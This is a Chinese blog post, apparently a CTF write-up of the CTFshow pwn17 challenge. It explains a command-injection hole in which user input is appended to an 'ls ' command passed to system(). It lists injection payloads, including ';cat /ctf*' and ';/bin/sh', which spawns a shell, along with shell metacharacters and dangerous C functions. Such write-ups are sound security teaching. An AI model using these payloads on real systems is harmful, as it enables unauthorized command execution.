<!DOCTYPE html>
<html lang="zh-CN" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="referrer" content="no-referrer" />
  <meta name="author" content="luxlu" />
  <!-- Open Graph Description 简短摘要-->
  
  <!-- 用于搜索引擎的文章摘要 -->
  
  <meta name="description" content="CTF Misc Forensics Stego Writeup?" />
  
  
  
  <title>
    
      [ pwn 学习 ] CTFshow-pwn17 
      
      
      |
    
     luxlu
  </title>

  
    <link rel="apple-touch-icon" href="/img/sleepy-cat-favicon.jpg">
    <link rel="icon" href="/img/sleepy-cat-favicon.jpg">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  
    
<link rel="stylesheet" href="/css/figcaption/mac-block.css">

  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="luxlu" type="application/atom+xml">
</head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/img/avatar.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/">luxlu</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/categories/">
          <a href="/categories/">分类</a>
        </li>
      
        <li class="nav-item" data-path="/">
          <a href="/">主页</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">归档</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">关于</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">[ pwn 学习 ] CTFshow-pwn17</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
          2026-07-23 21:42:42
        </span>
        
              <span class="post-categories">
                <i class="iconfont icon-bookmark" title="分类"></i>
                
                <span class="span--category">
                  <a href="/categories/CTF/" title="CTF">
                    <b>#</b> CTF
                  </a>
                </span>
                
                <span class="span--category">
                  <a href="/categories/CTF/Pwn/" title="Pwn">
                    <b>#</b> Pwn
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h1 id="1-基础信息"><a href="#1-基础信息" class="headerlink" title="1. 基础信息"></a>1. 基础信息</h1><p>查看二进制文件安全防护</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">checksec pwn17</span><br><span class="line">  Arch:     amd64-<span class="number">64</span>-little</span><br><span class="line">  RELRO:    Full RELRO</span><br><span class="line">  Stack:    Canary found</span><br><span class="line">  NX:       NX enabled</span><br><span class="line">  PIE:      PIE enabled</span><br></pre></td></tr></table></figure>

<p>64 位程序，保护全开（Canary NX PIE 一个不少）</p>
<h1 id="2-反编译分析（main-函数）"><a href="#2-反编译分析（main-函数）" class="headerlink" title="2.反编译分析（main 函数）"></a>2.反编译分析（main 函数）</h1><p>对 main 函数反编译后</p>
<p>可以看出 核心结构是一个菜单循环（while1）</p>
<ul>
<li>选项 1：<code>system(&quot;id&quot;)</code>-执行 id 命令</li>
<li><strong>选项 2：列出目录内容（可自定义目录）</strong></li>
<li><strong>选项 3：假装要打印 <code>flag</code>（？）</strong></li>
<li>选项 4：<code>sleep</code>+认证失败提示</li>
<li>选项 5：退出</li>
</ul>
<p>5 个选项里值得一盯的是 Case2 和 Case3</p>
<h1 id="3-选项-3-烟雾弹"><a href="#3-选项-3-烟雾弹" class="headerlink" title="3. 选项 3-烟雾弹"></a>3. 选项 3-烟雾弹</h1><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> <span class="number">3</span>:</span><br><span class="line">    sleep(<span class="number">1u</span>);</span><br><span class="line">    <span class="comment">// 休眠1s</span></span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;$cat /ctfshow_flag&quot;</span>);</span><br><span class="line">    <span class="comment">// 假装在执行命令</span></span><br><span class="line">    sleep(<span class="number">1u</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;ctfshow&#123;&quot;</span>);</span><br><span class="line">    sleep(<span class="number">2u</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;... ...&quot;</span>);</span><br><span class="line">    sleep(<span class="number">3u</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Your flag is ...&quot;</span>);</span><br><span class="line">    sleep(<span class="number">5u</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;ctfshow&#123;flag is not here!&#125;&quot;</span>);</span><br><span class="line">    sleep(<span class="number">0x14u</span>);</span><br><span class="line">    <span class="comment">// 0x14=20s</span></span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;wtf?You haven&#x27;t left yet?\nOk~ give you flag:\nflag is loading......&quot;</span>);</span><br><span class="line">    sleep(<span class="number">0x1BF52u</span>);</span><br><span class="line">    <span class="comment">// 0x1BF52u=114514s...≈31h</span></span><br><span class="line">    system(<span class="string">&quot;cat /ctfshow_flag&quot;</span>);</span><br><span class="line">    <span class="comment">// 真打印flag</span></span><br><span class="line">    <span class="keyword">break</span>;</span><br></pre></td></tr></table></figure>

<p>等那么久。靶机连接也断了</p>
<h1 id="4-选项-2-漏洞点"><a href="#4-选项-2-漏洞点" class="headerlink" title="4. 选项 2-漏洞点"></a>4. 选项 2-漏洞点</h1><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> <span class="number">2</span>:</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;Which directory?(&#x27;/&#x27;,&#x27;./&#x27; or the directiry you want?)&quot;</span>);</span><br><span class="line">        read(<span class="number">0</span>, buf, <span class="number">0xAu</span>LL);</span><br><span class="line">        <span class="comment">// 从键盘读最多10字节到buf</span></span><br><span class="line">        <span class="built_in">strcat</span>(dest, buf);</span><br><span class="line">        <span class="comment">// 把buf拼接到dest后面</span></span><br><span class="line">        system(dest);</span><br><span class="line">        <span class="comment">// 把拼接后的dest当作命令执行</span></span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;Execution succeeded!&quot;</span>);</span><br><span class="line">        <span class="keyword">break</span>;</span><br></pre></td></tr></table></figure>

<h2 id="4-1-变量定义"><a href="#4-1-变量定义" class="headerlink" title="4.1 变量定义"></a>4.1 变量定义</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">char</span> dest[<span class="number">4</span>];        <span class="comment">// dest 这个&quot;杯子&quot;只能装 4 个字符</span></span><br><span class="line"><span class="type">char</span> buf[<span class="number">10</span>];        <span class="comment">// buf 这个&quot;杯子&quot;能装 10 个字符</span></span><br><span class="line">read(<span class="number">0</span>, buf, <span class="number">10</span>);    <span class="comment">// 从键盘读 10 个字符放进 buf</span></span><br><span class="line"><span class="built_in">strcat</span>(dest, buf);   <span class="comment">// 把 buf 的内容 &quot;倒进&quot; dest ← 杯子溢出了！</span></span><br></pre></td></tr></table></figure>

<p><code>dest</code>只有 4 字节 它里面预存的是”<code>ls </code>“(<code>l``s``空格``\0</code>刚好 4 字节)</p>
<h2 id="4-2-漏洞机制"><a href="#4-2-漏洞机制" class="headerlink" title="4.2 漏洞机制"></a>4.2 漏洞机制</h2><p><code>dest[4]</code>只能装 4 个字符 但是<code>buf[10]</code>里最多有 10 个字符 把<code>buf</code>的内容倒进<code>dest</code>会溢出 溢出数据会覆盖<code>v4</code>以及栈保护值<code>canary</code></p>
<p>溢出之后 还要看溢出的数据到哪里</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">strcat</span>(dest, buf);<span class="comment">//找到dest的末尾，然后把buf的内容从那里开始往后写</span></span><br><span class="line">system(dest); <span class="comment">//把dest的内容当作系统命令执行</span></span><br></pre></td></tr></table></figure>

<p> 比如<code>dest</code>原本存的是<code>ls</code>，输入<code> /flag</code>，拼接后变成 <code>ls /flag</code>，然后 <code>system()</code>，会执行了（溢出数据如果被<code>system()</code>执行，就是命令注入）</p>
<p>这时<code>dest</code>存入 4 个字符 分别是：<code>l``s``空格符号``固定字符串末尾 \0</code></p>
<p>之后<code>strcat</code>拼接时从<code>\0</code>位置开始写入。</p>
<p>找到<code>\0</code>后把<code>\0</code>替换成<code>buf</code>的第一个字符</p>
<table>
<thead>
<tr>
<th>写的</th>
<th>实际存的</th>
</tr>
</thead>
<tbody><tr>
<td><code>&quot;ls &quot;</code></td>
<td>l、s、空格</td>
</tr>
<tr>
<td><code>/flag</code>（用户输入）</td>
<td>&#x2F;、f、l、a、g</td>
</tr>
<tr>
<td>拼接后<code>&quot;ls /flag&quot;</code></td>
<td>l、s、空格、&#x2F;、f、l、a、g</td>
</tr>
</tbody></table>
<p>问题在于程序对用户的输入零过滤。你输入什么，它就往命令后面拼什么。</p>
<p>比如原本<code>dest</code>&#x3D;”<code>ls </code>“</p>
<p>你输入<code>/flag</code></p>
<p><code>strcat</code>后<code>dest</code>&#x3D;”<code>ls /flag</code>“</p>
<p><code>system(&quot;ls /flag&quot;)</code>就会正常列出<code>/flag</code>目录</p>
<p>但是如果输入的不是目录名，而是一个命令分割符+任意命令呢……？</p>
<h1 id="5-攻击思路-分号截断命令注入"><a href="#5-攻击思路-分号截断命令注入" class="headerlink" title="5.攻击思路-分号截断命令注入"></a>5.攻击思路-分号截断命令注入</h1><p><strong>在 Linux shell 中，<code>;</code>是命令分隔符号。</strong></p>
<p><strong>执行<code>cmd1;cmd2</code>时候，系统会先执行<code>cmd1</code>，然后无论成功与否，接着执行<code>cmd2</code></strong></p>
<p>那我们就可以构造 payload</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">;cat /ctf*</span><br></pre></td></tr></table></figure>

<p>9 个字符 满足 10 字符以内</p>
<p><code>dest</code>初始内容是<code>ls </code> 拼接后就是<code>ls ;cat/ctf*</code></p>
<p>那么<code>system</code>执行 就会 ①ls 列出当前目录 ②<code>cat /ctf*</code>(读取开头为 ctf 的文件)</p>
<p>（<code>ctf*</code>的话 ①<code>buf</code>就不会超过 10 个字符 ②<code>*</code>是 Linux 通配符，可以匹配任意长度的任意字符。只要根目录<code>/</code>下<code>ctf</code>开头的文件只有唯一一个 flag 文件。就可以精准匹配到。）</p>
<p>具体操作：连接题目连上后会看到目录</p>
<p><strong>输入2</strong></p>
<p>程序回显<code>Which directory?(&#39;/&#39;,&#39;./&#39; or the directory you want?)</code></p>
<p><strong>输入 payload <code>;cat/ctf*</code></strong></p>
<p>获得 flag</p>
<h1 id="6-更多可用的-payload"><a href="#6-更多可用的-payload" class="headerlink" title="6. 更多可用的 payload"></a>6. 更多可用的 payload</h1><table>
<thead>
<tr>
<th>Payload</th>
<th>长度</th>
<th>效果</th>
</tr>
</thead>
<tbody><tr>
<td><code>;cat /ctf*</code></td>
<td>9 字节</td>
<td>直接输出 flag</td>
</tr>
<tr>
<td><code>;/bin/sh</code></td>
<td>8 字节</td>
<td>弹一个交互式 shell，拿到后想干啥干啥</td>
</tr>
<tr>
<td><code>;cat /f*</code></td>
<td>8 字节</td>
<td>如果 flag 在根目录，用 f* 匹配更短</td>
</tr>
<tr>
<td><code>;ls /</code></td>
<td>5 字节</td>
<td>先看看根目录有啥文件，再决定怎么读</td>
</tr>
</tbody></table>
<h1 id="7-shell-特殊字符"><a href="#7-shell-特殊字符" class="headerlink" title="7.shell 特殊字符"></a>7.shell 特殊字符</h1><table>
<thead>
<tr>
<th>符号</th>
<th>作用</th>
<th>示例</th>
</tr>
</thead>
<tbody><tr>
<td><code>;</code></td>
<td>顺序执行多条命令（无论前一条成败）</td>
<td><code>ls ; cat flag</code></td>
</tr>
<tr>
<td><code>&amp;</code></td>
<td>前一条命令后台运行，紧接着执行后一条</td>
<td><code>sleep 10 &amp; ls</code></td>
</tr>
<tr>
<td><code>&amp;&amp;</code></td>
<td>前一条成功才执行后一条</td>
<td><code>make &amp;&amp; ./run</code></td>
</tr>
<tr>
<td>&#96;</td>
<td></td>
<td>&#96;</td>
</tr>
<tr>
<td><code>*</code></td>
<td>匹配任意长度字符的通配符</td>
<td><code>cat /ctf*</code></td>
</tr>
<tr>
<td><code>?</code></td>
<td>匹配单个字符的通配符</td>
<td><code>cat /???</code></td>
</tr>
<tr>
<td>&#96;</td>
<td>&#96;</td>
<td>管道，前一条输出作为后一条输入</td>
</tr>
<tr>
<td>&#96;&#96;&#96;</td>
<td>命令替换（反引号）</td>
<td><code>echo </code>ls<code> </code></td>
</tr>
<tr>
<td><code>$()</code></td>
<td>命令替换（现代写法）</td>
<td><code>echo $(cat flag)</code></td>
</tr>
</tbody></table>
<h1 id="8-此类漏洞思路"><a href="#8-此类漏洞思路" class="headerlink" title="8. 此类漏洞思路"></a>8. 此类漏洞思路</h1><h2 id="搜索危险函数"><a href="#搜索危险函数" class="headerlink" title="搜索危险函数"></a>搜索危险函数</h2><p>在 IDA 的 Import&#x2F;String 窗口中找这些函数名</p>
<table>
<thead>
<tr>
<th align="center">函数</th>
<th>为什么危险</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><code>gets()</code></td>
<td>读取输入不限制长度，必溢出</td>
</tr>
<tr>
<td align="center"><code>strcpy()</code></td>
<td>复制字符串不检查长度</td>
</tr>
<tr>
<td align="center"><code>strcat()</code></td>
<td>拼接字符串不检查长度</td>
</tr>
<tr>
<td align="center"><code>read()</code></td>
<td>第三个参数大于缓冲区大小就溢出</td>
</tr>
<tr>
<td align="center"><code>scanf(&quot;%s&quot;, ...)</code></td>
<td>不限制输入长度</td>
</tr>
<tr>
<td align="center"><code>sprintf()</code></td>
<td>格式化到缓冲区不检查长度</td>
</tr>
<tr>
<td align="center"><code>system() / execve()</code></td>
<td>执行命令，如果参数可控 &#x3D; 命令注入</td>
</tr>
</tbody></table>
<h2 id="比较缓冲区大小-vs-实际能写入的大小"><a href="#比较缓冲区大小-vs-实际能写入的大小" class="headerlink" title="比较缓冲区大小 vs 实际能写入的大小"></a>比较缓冲区大小 vs 实际能写入的大小</h2><p>找到缓冲区定义。再看<code>read</code>第三个参数或<code>strcpy/strcat</code>的目标大小</p>
<p>如果写入量＞缓冲区大小→存在溢出</p>
<h2 id="看溢出-注入后数据被用来做什么→确定漏洞类型"><a href="#看溢出-注入后数据被用来做什么→确定漏洞类型" class="headerlink" title="看溢出&#x2F;注入后数据被用来做什么→确定漏洞类型"></a>看溢出&#x2F;注入后数据被用来做什么→确定漏洞类型</h2><table>
<thead>
<tr>
<th>场景</th>
<th>漏洞类型</th>
</tr>
</thead>
<tbody><tr>
<td>system () 参数可控</td>
<td>命令注入（最简单，本题）</td>
</tr>
<tr>
<td>溢出覆盖栈上变量</td>
<td>栈溢出 → ROP</td>
</tr>
<tr>
<td>溢出覆盖函数指针</td>
<td>控制流劫持</td>
</tr>
<tr>
<td>溢出覆盖 Canary 且程序有输出</td>
<td>信息泄露 + 二次利用</td>
</tr>
</tbody></table>
<h2 id="构造-payload"><a href="#构造-payload" class="headerlink" title="构造 payload"></a>构造 payload</h2><ul>
<li><p>命令注入：用 ;、|、&amp;&amp; 等截断原命令</p>
</li>
<li><p>栈溢出：计算偏移 → 覆盖返回地址 → ROP 链</p>
</li>
<li><p>注意 长度限制（本题的 10 字节）、坏字符过滤（如 &#x2F;bin&#x2F;sh 被 ban 用 &#x2F;bin&#x2F;bash 替代）等约束</p>
</li>
</ul>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/posts/zeroG-ctf-moonlight-radio/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>上一页</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
              2026-07-23 21:42:42
            </span>
            
                  <span class="post-categories">
                    <i class="iconfont icon-bookmark" title="分类"></i>
                    
                    <span class="span--category">
                      <a href="/categories/CTF/" title="CTF">
                        <b>#</b> CTF
                      </a>
                    </span>
                    
                    <span class="span--category">
                      <a href="/categories/CTF/Pwn/" title="Pwn">
                        <b>#</b> Pwn
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
              <a href="/posts/ctfshow-pwn18/" target="_self">
                <span>下一页</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">目录</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#1-%E5%9F%BA%E7%A1%80%E4%BF%A1%E6%81%AF"><span class="toc-text">1. 基础信息</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2-%E5%8F%8D%E7%BC%96%E8%AF%91%E5%88%86%E6%9E%90%EF%BC%88main-%E5%87%BD%E6%95%B0%EF%BC%89"><span class="toc-text">2.反编译分析（main 函数）</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#3-%E9%80%89%E9%A1%B9-3-%E7%83%9F%E9%9B%BE%E5%BC%B9"><span class="toc-text">3. 选项 3-烟雾弹</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#4-%E9%80%89%E9%A1%B9-2-%E6%BC%8F%E6%B4%9E%E7%82%B9"><span class="toc-text">4. 选项 2-漏洞点</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#4-1-%E5%8F%98%E9%87%8F%E5%AE%9A%E4%B9%89"><span class="toc-text">4.1 变量定义</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-2-%E6%BC%8F%E6%B4%9E%E6%9C%BA%E5%88%B6"><span class="toc-text">4.2 漏洞机制</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#5-%E6%94%BB%E5%87%BB%E6%80%9D%E8%B7%AF-%E5%88%86%E5%8F%B7%E6%88%AA%E6%96%AD%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5"><span class="toc-text">5.攻击思路-分号截断命令注入</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#6-%E6%9B%B4%E5%A4%9A%E5%8F%AF%E7%94%A8%E7%9A%84-payload"><span class="toc-text">6. 更多可用的 payload</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#7-shell-%E7%89%B9%E6%AE%8A%E5%AD%97%E7%AC%A6"><span class="toc-text">7.shell 特殊字符</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#8-%E6%AD%A4%E7%B1%BB%E6%BC%8F%E6%B4%9E%E6%80%9D%E8%B7%AF"><span class="toc-text">8. 此类漏洞思路</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%90%9C%E7%B4%A2%E5%8D%B1%E9%99%A9%E5%87%BD%E6%95%B0"><span class="toc-text">搜索危险函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%AF%94%E8%BE%83%E7%BC%93%E5%86%B2%E5%8C%BA%E5%A4%A7%E5%B0%8F-vs-%E5%AE%9E%E9%99%85%E8%83%BD%E5%86%99%E5%85%A5%E7%9A%84%E5%A4%A7%E5%B0%8F"><span class="toc-text">比较缓冲区大小 vs 实际能写入的大小</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9C%8B%E6%BA%A2%E5%87%BA-%E6%B3%A8%E5%85%A5%E5%90%8E%E6%95%B0%E6%8D%AE%E8%A2%AB%E7%94%A8%E6%9D%A5%E5%81%9A%E4%BB%80%E4%B9%88%E2%86%92%E7%A1%AE%E5%AE%9A%E6%BC%8F%E6%B4%9E%E7%B1%BB%E5%9E%8B"><span class="toc-text">看溢出&#x2F;注入后数据被用来做什么→确定漏洞类型</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9E%84%E9%80%A0-payload"><span class="toc-text">构造 payload</span></a></li></ol></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          
              <a title="github" target="_blank" rel="noopener" href="https://github.com/lrx-hh">
                <i class="iconfont icon-github"></i>
              </a>
              
        </li>
        
        <li>
          
            <a title="email" href="mailto:mailto:luxlu667@gmail.com">
              <i class="iconfont icon-envelope"></i>
            </a>
            
        </li>
        
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a href="https://luxlu.top">Copyright © 2026 luxlu</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
    <div class="footer-views">
      
          本站总访问量<span id="busuanzi_value_site_pv"></span>次
        
      
          本文总阅读量<span id="busuanzi_value_page_pv"></span>次
        
      
          本站访客数<span id="busuanzi_value_site_uv"></span>人
        
      
    </div>
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="搜索...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>首次搜索，正在载入索引文件，请稍后……<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容，请尝试更换检索词。<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>未找到search.xml文件，具体请参考：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>请求失败，尝试重新刷新页面或稍后重试。<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
